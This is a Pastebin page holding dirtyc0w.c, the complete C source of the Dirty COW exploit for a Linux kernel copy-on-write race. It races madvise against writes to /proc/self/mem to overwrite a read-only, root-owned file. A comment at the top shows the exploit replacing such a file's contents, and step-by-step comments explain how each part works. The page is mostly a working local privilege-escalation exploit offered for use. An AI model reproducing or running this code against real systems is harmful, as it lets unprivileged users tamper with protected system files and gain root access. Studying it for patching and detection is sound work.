API tools faq
paste
Advertisement
Guest User

dirtyc0w.c

a guest
Oct 21st, 2016
790
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.61 KB | None | 0 0
raw download clone embed print report
  1. /*
  2. ####################### dirtyc0w.c #######################
  3. $ sudo -s
  4. # echo this is not a test > foo
  5. # chmod 0404 foo
  6. $ ls -lah foo
  7. -r-----r-- 1 root root 19 Oct 20 15:23 foo
  8. $ cat foo
  9. this is not a test
  10. $ gcc -lpthread dirtyc0w.c -o dirtyc0w
  11. $ ./dirtyc0w foo m00000000000000000
  12. mmap 56123000
  13. madvise 0
  14. procselfmem 1800000000
  15. $ cat foo
  16. m00000000000000000
  17. ####################### dirtyc0w.c #######################
  18. */
  19. #include <stdio.h>
  20. #include <sys/mman.h>
  21. #include <fcntl.h>
  22. #include <pthread.h>
  23. #include <string.h>
  24. void *map;
  25. int f;
  26. struct stat st;
  27. char *name;
  28. void *madviseThread(void *arg)
  29. {
  30. char *str;
  31. str=(char*)arg;
  32. int i,c=0;
  33. for(i=0;i<100000000;i++)
  34. {
  35. /*
  36. You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
  37. > This is achieved by racing the madvise(MADV_DONTNEED) system call
  38. > while having the page of the executable mmapped in memory.
  39. */
  40. c+=madvise(map,100,MADV_DONTNEED);
  41. }
  42. printf("madvise %d\n\n",c);
  43. }
  44. void *procselfmemThread(void *arg)
  45. {
  46. char *str;
  47. str=(char*)arg;
  48. /*
  49. You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
  50. > The in the wild exploit we are aware of doesn't work on Red Hat
  51. > Enterprise Linux 5 and 6 out of the box because on one side of
  52. > the race it writes to /proc/self/mem, but /proc/self/mem is not
  53. > writable on Red Hat Enterprise Linux 5 and 6.
  54. */
  55. int f=open("/proc/self/mem",O_RDWR);
  56. int i,c=0;
  57. for(i=0;i<100000000;i++) {
  58. /*
  59. You have to reset the file pointer to the memory position.
  60. */
  61. lseek(f,map,SEEK_SET);
  62. c+=write(f,str,strlen(str));
  63. }
  64. printf("procselfmem %d\n\n", c);
  65. }
  66. int main(int argc,char *argv[])
  67. {
  68. /*
  69. You have to pass two arguments. File and Contents.
  70. */
  71. if (argc<3)return 1;
  72. pthread_t pth1,pth2;
  73. /*
  74. You have to open the file in read only mode.
  75. */
  76. f=open(argv[1],O_RDONLY);
  77. fstat(f,&st);
  78. name=argv[1];
  79. /*
  80. You have to use MAP_PRIVATE for copy-on-write mapping.
  81. > Create a private copy-on-write mapping. Updates to the
  82. > mapping are not visible to other processes mapping the same
  83. > file, and are not carried through to the underlying file. It
  84. > is unspecified whether changes made to the file after the
  85. > mmap() call are visible in the mapped region.
  86. */
  87. /*
  88. You have to open with PROT_READ.
  89. */
  90. map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  91. printf("mmap %x\n\n",map);
  92. /*
  93. You have to do it on two threads.
  94. */
  95. pthread_create(&pth1,NULL,madviseThread,argv[1]);
  96. pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
  97. /*
  98. You have to wait for the threads to finish.
  99. */
  100. pthread_join(pth1,NULL);
  101. pthread_join(pth2,NULL);
  102. return 0;
  103. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!